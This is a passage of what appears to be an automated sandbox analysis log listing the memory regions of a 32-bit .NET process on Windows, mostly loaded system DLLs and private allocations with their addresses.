entry_point = 0x753b2e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 2352 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2353 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2354 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2355 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2356 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2357 start_va = 0x110000 end_va = 0x176fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2358 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2359 start_va = 0x180000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2360 start_va = 0x7fff0000 end_va = 0x7fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2361 start_va = 0x80000000 end_va = 0x8000ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000080000000" filename = "" Region: id = 2362 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2363 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2364 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2365 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2366 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2367 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2368 start_va = 0x7a0000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2369 start_va = 0x75320000 end_va = 0x753acfff monitored = 1 entry_point = 0x75332860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 2370 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2371 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2372 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2373 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2374 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2375 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2376 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2377 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2378 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2379 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2380 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2381 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2382 start_va = 0xa80000 end_va = 0xc00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 2383 start_va = 0xc10000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 2384 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2385 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2386 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2387 start_va = 0x71d30000 end_va = 0x724defff monitored = 1 entry_point = 0x71d4d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2388 start_va = 0x724e0000 end_va = 0x72c8efff monitored = 1 entry_point = 0x724fd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2389 start_va = 0x71d30000 end_va = 0x724defff monitored = 1 entry_point = 0x71d4d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2390 start_va = 0x75300000 end_va = 0x75313fff monitored = 0 entry_point = 0x7530ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 2391 start_va = 0x72be0000 end_va = 0x72c8afff monitored = 0 entry_point = 0x72c75f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 2392 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2393 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2394 start_va = 0x90000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2395 start_va = 0xa0000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2396 start_va = 0xb0000 end_va = 0xbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2397 start_va = 0xc0000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2398 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2399 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2400 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2401 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2402 start_va = 0x2010000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 2403 start_va = 0x2160000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 2404 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2405 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2406 start_va = 0x21c0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 2407 start_va = 0x22e0000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 2408 start_va = 0xfffd8000 end_va = 0xfffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffd8000" filename = "" Region: id = 2409 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2410 start_va = 0x2320000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2411 start_va = 0x5a0000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2412 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 2413 start_va = 0x230000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2414 start_va = 0x2020000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 2415 start_va = 0x2120000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 2416 start_va = 0xfffd5000 end_va = 0xfffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffd5000" filename = "" Region: id = 2417 start_va = 0x380000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2418 start_va = 0x4330000 end_va = 0x442ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 2419 start_va = 0xfffad000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffad000" filename = "" Region: id = 2420 start_va = 0x4430000 end_va = 0x46fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2425 start_va = 0x70920000 end_va = 0x71d2afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 2426 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2427 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2428 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2429 start_va = 0x75400000 end_va = 0x75402fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 2430 start_va = 0x72b50000 end_va = 0x72bd8fff monitored = 1 entry_point = 0x72b51130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 2431 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2432 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2433 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2434 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2435 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2436 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2530 start_va = 0x6fec0000 end_va = 0x70914fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 2531 start_va = 0x6f6a0000 end_va = 0x6feb7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 2532 start_va = 0x6e290000 end_va = 0x6f696fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.ServiceModel\\74d6cec37a30e1133f67258ce3ea5ea7\\System.ServiceModel.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servicemodel\\74d6cec37a30e1133f67258ce3ea5ea7\\system.servicemodel.ni.dll") Region: id = 2533 start_va = 0x72840000 end_va = 0x72b44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.identitymodel.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.IdentityModel\\c2ef5bc545b98a289f02d0b3eddbe280\\System.IdentityModel.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.identitymodel\\c2ef5bc545b98a289f02d0b3eddbe280\\system.identitymodel.ni.dll") Region: id = 2534 start_va = 0x724e0000 end_va = 0x727b2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runteb92aa12#\\274e43040c8a7a02ef1065db3283005a\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runteb92aa12#\\274e43040c8a7a02ef1065db3283005a\\system.runtime.serialization.ni.dll") Region: id = 2535 start_va = 0x4700000 end_va = 0x491ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2536 start_va = 0x6e270000 end_va = 0x6e28ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\SMDiagnostics\\dc67dcb4b2fb4a3853d458cab08561f0\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\smdiagnostics\\dc67dcb4b2fb4a3853d458cab08561f0\\smdiagnostics.ni.dll") Region: id = 2537 start_va = 0x6daf0000 end_va = 0x6e263fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 2538 start_va = 0x6da20000 end_va = 0x6daebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Servd1dec626#\\7679b916bf64989f7e8559969b308da1\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servd1dec626#\\7679b916bf64989f7e8559969b308da1\\system.servicemodel.internals.ni.dll") Region: id = 2539 start_va = 0x742b0000 end_va = 0x742c6fff monitored = 0 entry_point = 0x742b3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2540 start_va = 0x3c0000 end_va = 0x3fbfff monitored = 0 entry_point = 0x3c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2541 start_va = 0x3c0000 end_va = 0x3fbfff monitored = 0 entry_point = 0x3c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2542 start_va = 0x3c0000 end_va = 0x3fbfff monitored = 0 entry_point = 0x3c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2543 start_va = 0x3c0000 end_va = 0x3fbfff monitored = 0 entry_point = 0x3c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2544 start_va = 0x3c0000 end_va = 0x3fbfff monitored = 0 entry_point = 0x3c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2545 start_va = 0x74270000 end_va = 0x742aafff monitored = 0 entry_point = 0x7427128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2546 start_va = 0x72820000 end_va = 0x72832fff monitored = 1 entry_point = 0x7282d900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 2547 start_va = 0x4920000 end_va = 0x4bf1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 2548 start_va = 0x6d910000 end_va = 0x6da14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 2553 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2554 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2555 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2556 start_va = 0x72800000 end_va = 0x72816fff monitored = 0 entry_point = 0x728035fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2831 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2832 start_va = 0xfff50000 end_va = 0xfff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff50000" filename = "" Region: id = 2833 start_va = 0xfff40000 end_va = 0xfff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff40000" filename = "" Region: id = 2834 start_va = 0x420000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 2835 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2836 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2837 start_va = 0x744e0000 end_va = 0x7451bfff monitored = 0 entry_point = 0x744e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2838 start_va = 0x744d0000 end_va = 0x744d4fff monitored = 0 entry_point = 0x744d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 2839 start_va = 0x744c0000 end_va = 0x744c5fff monitored = 0 entry_point = 0x744c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 2840 start_va = 0x74560000 end_va = 0x745a3fff monitored = 0 entry_point = 0x745763f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2841 start_va = 0x4700000 end_va = 0x48cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2842 start_va = 0x48e0000 end_va = 0x491ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 2843 start_va = 0x74540000 end_va = 0x7455bfff monitored = 0 entry_point = 0x7454a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2844 start_va = 0x74530000 end_va = 0x74536fff monitored = 0 entry_point = 0x7453128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2845 start_va = 0x744b0000 end_va = 0x744b5fff monitored = 0 entry_point = 0x744b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2846 start_va = 0x743f0000 end_va = 0x74427fff monitored = 0 entry_point = 0x743f990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2847 start_va = 0x4700000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2848 start_va = 0x4890000 end_va = 0x48cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 2853 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2854 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2855 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2856 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2857 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2858 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2859 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2860 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2861 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2862 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2863 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2864 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2865 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2866 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 